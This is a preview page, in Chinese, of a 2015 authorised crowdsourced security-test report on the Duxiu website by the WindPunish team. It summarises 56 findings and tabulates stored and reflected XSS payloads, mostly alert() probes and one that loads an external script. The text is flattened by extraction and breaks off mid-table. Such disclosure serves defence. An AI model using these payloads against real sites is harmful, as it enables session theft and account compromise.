- 1、本文档共11页,可阅读全部内容。
- 2、原创力文档(book118)网站文档一经付费(服务费),不意味着购买了该文档的版权,仅供个人/单位学习、研究之用,不得用于商业用途,未经授权,严禁复制、发行、汇编、翻译或者网络传播等,侵权必究。
- 3、本站所有内容均由合作方或网友上传,本站不对文档的完整性、权威性及其观点立场正确性做任何保证或承诺!文档内容仅供研究参考,付费前请自行鉴别。如您付费,意味着您自己接受本站规则且自行承担风险,本站不退款、不进行额外附加服务;查看《如何避免下载的几个坑》。如果您已付费下载过本站文档,您可以点击 这里二次下载。
- 4、如文档侵犯商业秘密、侵犯著作权、侵犯人身权等,请点击“版权申诉”(推荐),也可以打举报电话:400-050-0827(电话支持时间:9:00-18:30)。
查看更多
众测报告-WindPunish安全试验室
读秀网站安全检测报告
机构:Wind Punish网络安全团队
时间:2015年11月29日
版本 V1.0 密级 商密 修订人员 crown prince
版本 V2.0 密级 商密 修订人员 Wind Punish核心成员组
版本 V3.0 密级 商密 修订人员 路人甲007
目录
检测概述 3
检测涉及范围 3
漏洞类型统计 3
漏洞详细描述 4
XSS漏洞 4
SQL注入 6
存在爆破风险 8
其他漏洞 9
修复建议 10
结束语 10
1.检测概述:
Wind Punish网络安全团队共24名成员参与本次众测,于2015年11月21日
至28日期间获得读秀网()授权,并在该期间对读秀网站进行安全检测。
2.检测涉及范围:
以及读秀其他web界面
本次报告共检测出漏洞56处,其中高危2处、中危52处、低危2处。
注:高中危漏洞应及时修复、低危为建议修复。
3.漏洞类型统计
34处XSS漏洞 (中危)
18处其他类型(未授权访问,越权下载,信息泄露,CSRF的)漏洞 (中危)
2处SQL注入漏洞 (高危)
2处存在爆破风险的漏洞 (低危)
共计:56处漏洞
4.漏洞详细描述
①XSS漏洞
反射型XSS:18处
存储型XSS:16处
共计:34处XSS漏洞
注:
表格中标明XSS语句,以帮助厂商进行针对性过滤。
WP对读秀进行的是全方位的安全众测,故不同成员提交的同一URL如果存在多种差别较大的XSS语句,我们视为不同漏洞。
XSS漏洞类型 XSS链接/XSS方式 XSS语句 短消息存储型XSS /a/sxxxMsg.action?xxx =xxx
input onmousemove=alert(1) 个人主页存储型XSS /a/xxxx?uid=xxxxxx=xsseng \x22\x3e\x3cinput oninput=alert\x281\x29\x3e 论坛存储型XSS /xxx/7061/xxx.htm 上传处提交[RAR]javascript:alert(1)|txt[/RAR] 论坛中针对IE内核的XSS 上传txt可以直接触发xss 评论处存储型XSS /repository/xxxrites/xxxx/xxxnfo.xxxx?repid=11xxxfavid=xxx img src=x onerror=s=createElement(script);body.appendChild(s);s.src=/RUnjBEG; 留言板存储型XSS /xxxx/repositoryMsg/xxxx?repid=178354 input oninput=alert(1) 个人主页存储型XSS-2 /xxxxx img src=1 onerror=alert(location.href) 个人主页html代码标签读取 进入个人图书馆,新建分类。 axss/a 短消息存储型XSS-2 将XSS语句发送给被攻击方,触发指定型存储XSS /textareaimg?src=# onerror=alert(/xss/)
论坛存储型XSS-2 /topic/xxx/xxx.htm /textareaimg?src=# onerror=alert(/xss/) 个人主页存储型XSS-3 /xxx/xxx?uid=xxxx “img src = 1 onerror = alert(/in2/) 评论处存储型XSS-2 /xxx/favorites/xxx/repFavInfo.jspx?repid=183079xxxx=6788832 /liimg onerror=alert(/in2/) src=#
反馈处存储型XSS /xxxx.jsp 未过滤 个人主页存储型XSS-4 img src=1 onerror=alert(/1/) 留言板存储型XSS-2 推荐处可提交XSS代码,造成存储型XSS 未过滤 个人主页,新建分类处存储型XSS /a/xxx?uidname=xxx 个人主页新建分类时,分类名未过滤 反射型XSS /xxx.aspx?id=55wd=xss onmousemove=alert(1) x=x xss onmousemove=ale
文档评论(0)